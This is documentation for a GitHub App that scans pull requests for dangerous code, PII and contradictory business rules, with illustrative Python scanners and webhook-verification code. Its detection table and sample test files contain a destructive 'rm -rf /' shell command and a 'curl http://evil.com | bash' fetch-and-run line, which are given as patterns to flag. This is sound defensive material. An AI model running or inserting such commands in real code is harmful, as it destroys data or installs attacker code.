# QWED Security GitHub App

> QWED Security GitHub App scans pull requests using formal solvers (SymPy, Z3) and AST analysis to mathematically prove code, math, and logic correctness.

QWED Security is a **GitHub App** that automatically scans your Pull Requests with deterministic verification engines, not another LLM. AST analysis flags dangerous code patterns, and formal solvers (SymPy, Z3) **mathematically prove** that the math and logic in your PRs hold.

<Tip>
  **Unlike AI code reviewers that "guess," QWED Security provides deterministic proof. 1+1 always equals 2.**
</Tip>

## How it works

```text theme={null}
Pull Request Opened / Updated
        ↓
GitHub Webhook → QWED Security App
        ↓
QWEDLocal Verification Engine
  ├─ 🛡️ Code Security (AST Analysis)
  ├─ 🧮 Math Verification (SymPy)
  ├─ ⚖️ Logic Validation (Z3 Prover)
  └─ 🔒 PII Detection (Regex Patterns)
        ↓
✅ Pass  or  ❌ Fail
        ↓
Results posted as a GitHub Check Run
```

1. A developer opens or updates a Pull Request
2. GitHub sends a webhook event to the QWED Security App
3. The app creates a **Check Run** ("QWED Security") on the PR
4. Files are scanned using `QWEDLocal` — QWED's in-process verification engine
5. Results are posted directly to the **Checks tab** on the PR

## What QWED Security catches

### 🛡️ Code security (AST analysis)

Detects dangerous code patterns before they reach production. These are pattern matches on the parsed AST, so a flagged call or import is a finding to review in context, not proof that the code is exploitable:

| Pattern           | Example                          | Risk                     |
| ----------------- | -------------------------------- | ------------------------ |
| Shell injection   | `os.system('rm -rf /')`          | Remote code execution    |
| Eval/Exec         | `eval(user_input)`               | Arbitrary code execution |
| Pipe-to-shell     | `curl http://evil.com \| bash`   | Supply chain attack      |
| Hardcoded secrets | `api_key = "sk-proj-..."`        | Credential exposure      |
| Unsafe imports    | `import subprocess`              | Privilege escalation     |

### 🧮 Math verification (SymPy)

Validates mathematical formulas and constants — tax rate calculations, interest/NPV formulas, unit conversions, and financial compliance rules.

### ⚖️ Logic validation (Z3 prover)

Ensures boolean logic and business rules are satisfiable — contract clause contradictions, business rule conflicts, and constraint satisfaction.
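The check a logic validator performs on business rules, as an added example that is not QWED's code: are the rules jointly satisfiable, and if a scenario makes them contradict, which rules are to blame? QWED uses the Z3 SMT solver for this; the block below does the same check by exhaustive enumeration over small finite domains, which is exact for toy rule sets and needs only the standard library. The domains, rule names and scenarios are constructed for illustration.

```python
"""Satisfiability check for a set of business rules (added example, not
QWEDLocal's engine).  Exhaustive enumeration stands in for Z3 here."""
from itertools import combinations, product

# Variables with constructed finite domains.
DOMAINS = {
    "tier": ("free", "pro"),
    "region": ("us", "eu"),
    "discount": tuple(range(0, 31, 5)),  # percent, 0..30 in steps of 5
}

# Each rule is (name, predicate over an assignment dict).
RULES = [
    ("pro_min_discount", lambda a: a["tier"] != "pro" or a["discount"] >= 10),
    ("eu_discount_cap",  lambda a: a["region"] != "eu" or a["discount"] <= 5),
    ("discount_ceiling", lambda a: a["discount"] <= 30),
]


def assignments(domains):
    """Yield every assignment of the variables to values in their domains."""
    names = list(domains)
    for values in product(*(domains[n] for n in names)):
        yield dict(zip(names, values))


def find_model(rules, domains, extra=()):
    """Return one assignment satisfying all rules and all extra constraints,
    or None if no such assignment exists (the rules are unsatisfiable)."""
    for a in assignments(domains):
        if all(p(a) for _, p in rules) and all(p(a) for p in extra):
            return a
    return None


def minimal_conflict(rules, domains, extra=()):
    """Smallest subset of rule names that is already unsatisfiable together
    with `extra`.  Empty list when the whole rule set is satisfiable."""
    if find_model(rules, domains, extra) is not None:
        return []
    for k in range(1, len(rules) + 1):
        for subset in combinations(rules, k):
            if find_model(list(subset), domains, extra) is None:
                return [name for name, _ in subset]
    return [name for name, _ in rules]  # not reached: the full set is unsat


def check_rules(rules, domains, scenario):
    """Validate the rules for a scenario that pins some variables, e.g.
    {"tier": "pro", "region": "eu"}.  Reports the conflicting rules, if any."""
    fixed = [(lambda a, k=k, v=v: a[k] == v) for k, v in scenario.items()]
    conflict = minimal_conflict(rules, domains, fixed)
    return {"satisfiable": not conflict, "conflict": conflict}


if __name__ == "__main__":
    # The rule set is consistent on its own, but a pro customer in the EU
    # cannot be given any discount that satisfies both rules at once.
    print(check_rules(RULES, DOMAINS, {}))
    print(check_rules(RULES, DOMAINS, {"tier": "pro", "region": "eu"}))
```

The point of the minimal-conflict search is that rules can be individually sensible and jointly consistent, yet contradict for a reachable input; reporting only "unsatisfiable" tells a reviewer nothing about which clauses to fix.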

### 🔒 PII detection

Detects sensitive data before it enters your codebase — credit card numbers, Social Security Numbers, email addresses, and API keys.
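An added example, not QWED's or QWEDLocal's code, of the two scanning styles this section and the code-security section describe: Python's `ast` module locates forbidden calls, unsafe imports and pipe-to-shell strings structurally, and regular expressions run over the raw text to catch PII and API-key-shaped literals (including in comments). The rule names, regexes, sample files and report wording are assumptions chosen to mirror the check-run output shown later on this page.

```python
"""Minimal PR file scanner (added example, not QWED's engine): AST rules for
dangerous code plus regex rules for PII/secrets, rendered as a report."""
import ast
import re

FORBIDDEN_CALLS = {"eval", "exec", "os.system", "subprocess.Popen"}
FORBIDDEN_IMPORTS = {"subprocess"}
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b.*\|\s*(ba|z)?sh\b")
PII_PATTERNS = {  # illustrative patterns, deliberately simple
    "ssn": re.compile(r"\b\d{3}-\d{2}-\d{4}\b"),
    "credit_card": re.compile(r"\b(?:\d[ -]?){13,16}\b"),
    "email": re.compile(r"\b[\w.+-]+@[\w-]+\.[\w.-]+\b"),
    "api_key": re.compile(r"\b(sk-proj-|ghp_|AKIA)[A-Za-z0-9_-]{8,}"),
}


def _dotted(node):
    """Return 'a.b.c' for a Name/Attribute chain such as os.system, else None."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def scan_source(filename, source):
    """Return sorted, de-duplicated (line, code, reason) findings for one file."""
    findings = []
    try:
        tree = ast.parse(source, filename=filename)
    except SyntaxError as e:
        return [(e.lineno or 0, "PARSE_ERROR", str(e))]
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            name = _dotted(node.func)
            if name in FORBIDDEN_CALLS:
                findings.append((node.lineno, "SECURITY_RISK",
                                 f"Forbidden function '{name}' detected"))
        elif isinstance(node, (ast.Import, ast.ImportFrom)):
            mods = ([a.name for a in node.names] if isinstance(node, ast.Import)
                    else [node.module or ""])
            for m in mods:
                if m.split(".")[0] in FORBIDDEN_IMPORTS:
                    findings.append((node.lineno, "SECURITY_RISK",
                                     f"Unsafe import '{m}' detected"))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            if PIPE_TO_SHELL.search(node.value):
                findings.append((node.lineno, "SECURITY_RISK",
                                 "Pipe-to-shell command in string literal"))
    # PII/secret rules run over raw text so comments are covered too.
    for lineno, line in enumerate(source.splitlines(), 1):
        for kind, pat in PII_PATTERNS.items():
            if pat.search(line):
                findings.append((lineno, "PII_DETECTED", f"{kind} pattern found"))
    return sorted(set(findings))


def render_report(results):
    """results maps filename -> findings; layout follows the check-run text."""
    failed = {f: r for f, r in results.items() if r}
    passed = [f for f, r in results.items() if not r]
    out = ["QWED Verification Report", ""]
    if failed:
        out.append("🚨 Issues Detected")
        for f, r in failed.items():
            for _, code, reason in r:
                out.append(f"❌ {f}: {code}")
                out.append(f"  > Reason: {reason}")
        out.append("")
    out.append("✅ Verified Files")
    out.extend(f"✅ {f}: Passed" for f in passed)
    return "\n".join(out)


# Constructed sample files standing in for the changed files of a PR.
SAMPLES = {
    "dangerous.py": "import os\nos.system('rm -rf /')\n",
    "installer.py": "CMD = 'curl http://evil.com | bash'\n",
    "config.py": "api_key = \"sk-proj-abcdef1234567890\"  # ssn 123-45-6789\n",
    "math_logic.py": "def area(r):\n    return 3.14159 * r * r\n",
}


def scan_all(samples=SAMPLES):
    return {name: scan_source(name, src) for name, src in samples.items()}


if __name__ == "__main__":
    print(render_report(scan_all()))
```

Two caveats a practitioner would want: the call rule matches the literal dotted name, so `from os import system` or `import subprocess as sp` evades it unless the scanner resolves aliases; and the regexes are screening heuristics, so a digit run that looks like a card number is a finding to triage, not a confirmed leak.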

## Installation

1. Visit [QWED Security on GitHub Marketplace](https://github.com/marketplace/qwed-security)
2. Click **Install**
3. Select the repositories you want to protect
4. Done — QWED Security will automatically scan new Pull Requests

<Tip>
  QWED Security is a **Verified Publisher** on GitHub Marketplace. You can install it directly from the [Marketplace listing](https://github.com/marketplace/qwed-security).
</Tip>

### Plans

| Plan     | Scope                                   | Price       |
| -------- | --------------------------------------- | ----------- |
| **Free** | Open source & personal repositories     | \$0         |
| **Pro**  | Private repositories, priority scanning | Coming soon |

## Check run output

When QWED Security scans a PR, you'll see results directly in the **Checks tab**:

### ✅ All clear

```text theme={null}
QWED Verification Report

✅ Verified Files
✅ math_logic.py: Passed
✅ api_handler.py: Passed
```

### ❌ Issues found

```text theme={null}
QWED Verification Report

🚨 Issues Detected
❌ dangerous.py: SECURITY_RISK
  > Reason: Forbidden function 'os.system' detected

✅ Verified Files
✅ math_logic.py: Passed
```

## Privacy and security

* **No code storage**: Files are analyzed in-memory and discarded
* **Webhook verification**: each delivery's `X-Hub-Signature-256` header is validated as an HMAC-SHA256 over the raw request body before the event is processed
* **JWT authentication**: the app authenticates to GitHub with short-lived JWTs (10-minute expiry) and exchanges them for installation tokens scoped to the repositories you selected
* **Open source engines**: All verification logic is Apache 2.0
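The two receiver-side checks behind the webhook and JWT guarantees above, as an added example that is not QWED's code. `verify_webhook` recomputes GitHub's `X-Hub-Signature-256` value over the raw body and compares it in constant time; `app_jwt_claims` builds the `iat`/`exp`/`iss` claims a GitHub App JWT carries, and `check_jwt_window` rejects tokens that are expired, issued in the future, or valid more than ten minutes out. GitHub Apps sign that JWT with RS256 using the app's private key; signing is left to the caller so the block runs offline. The secret, app id, timestamps and sample delivery are constructed for illustration.

```python
"""Webhook signature validation and App JWT time-claim checks (added example,
not QWED's implementation).  Standard library only."""
import hashlib
import hmac
import json
import time

MAX_JWT_LIFETIME = 600      # GitHub rejects App JWTs whose exp is >10 min out
CLOCK_SKEW_ALLOWANCE = 60   # GitHub's docs set iat = now - 60 for skew


def sign_webhook(secret, body):
    """Compute the value GitHub places in X-Hub-Signature-256 for `body`."""
    mac = hmac.new(secret.encode(), body, hashlib.sha256).hexdigest()
    return "sha256=" + mac


def verify_webhook(secret, body, header_value):
    """True only if the header matches the raw body.  compare_digest keeps the
    comparison time independent of where the first mismatching byte is."""
    if not header_value or not header_value.startswith("sha256="):
        return False
    return hmac.compare_digest(sign_webhook(secret, body), header_value)


def app_jwt_claims(app_id, now=None):
    """Claims for a GitHub App JWT: issued slightly in the past for clock skew,
    expiring at the ten-minute maximum, issuer = the app id."""
    now = int(now if now is not None else time.time())
    return {"iat": now - CLOCK_SKEW_ALLOWANCE,
            "exp": now + MAX_JWT_LIFETIME,
            "iss": str(app_id)}


def check_jwt_window(claims, now=None):
    """Validate the time claims the way a strict verifier would.  Returns "ok"
    or a short reason for rejection."""
    now = int(now if now is not None else time.time())
    iat, exp = int(claims["iat"]), int(claims["exp"])
    if iat > now + CLOCK_SKEW_ALLOWANCE:
        return "issued in the future"
    if exp > now + MAX_JWT_LIFETIME:
        return "exp more than 10 minutes out"
    if now >= exp:
        return "expired"
    return "ok"


# Constructed sample delivery: a pull_request "opened" event body.
SECRET = "constructed-webhook-secret"
BODY = json.dumps({"action": "opened", "number": 42,
                   "pull_request": {"head": {"sha": "0" * 40}}}).encode()

if __name__ == "__main__":
    header = sign_webhook(SECRET, BODY)          # what GitHub would send
    print(verify_webhook(SECRET, BODY, header))  # True for the untouched body
    print(check_jwt_window(app_jwt_claims(12345)))
```

Verify over the raw bytes exactly as received, before any JSON parsing: a body that has been decoded and re-serialised will almost never reproduce the same MAC. The JWT only proves the app's identity; the Checks, Pull Requests and Contents permissions in the next section apply to the installation token obtained with it.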

## Permissions

| Permission        | Access       | Purpose                                |
| ----------------- | ------------ | -------------------------------------- |
| **Checks**        | Read & Write | Create and update Check Runs on PRs    |
| **Pull Requests** | Read         | Read PR metadata and trigger scans     |
| **Contents**      | Read         | Read repository files for verification |

## Configuration

QWED Security works out-of-the-box with zero configuration for Python projects. Install the app and it starts scanning PRs immediately.

* **Languages**: Python, Go, Rust, and TypeScript
* **Trigger**: Pull Request events (`opened`, `synchronize`, `reopened`)

## QWED Security app vs GitHub Action

| Feature          | QWED Security (App)    | QWED GitHub Action         |
| ---------------- | ---------------------- | -------------------------- |
| **Type**         | Installed GitHub App   | CI/CD Action               |
| **Setup**        | One-click install      | Add to workflow YAML       |
| **Trigger**      | Automatic on PR        | Configured in workflow     |
| **Verification** | Code security focus    | Math, Logic, Code, SQL     |
| **LLM Required** | No (AST analysis and formal solvers) | Optional (for translation) |

The GitHub App provides **automatic, zero-config PR scanning**. The GitHub Action provides **configurable verification** within your CI/CD pipeline. They complement each other.

## Support

* **Contact Form**: [qwedai.com/contact](https://qwedai.com/contact)
* **Email**: [support@qwedai.com](mailto:support@qwedai.com)
* **Issues**: [GitHub Issues](https://github.com/QWED-AI/qwed-verification/issues)
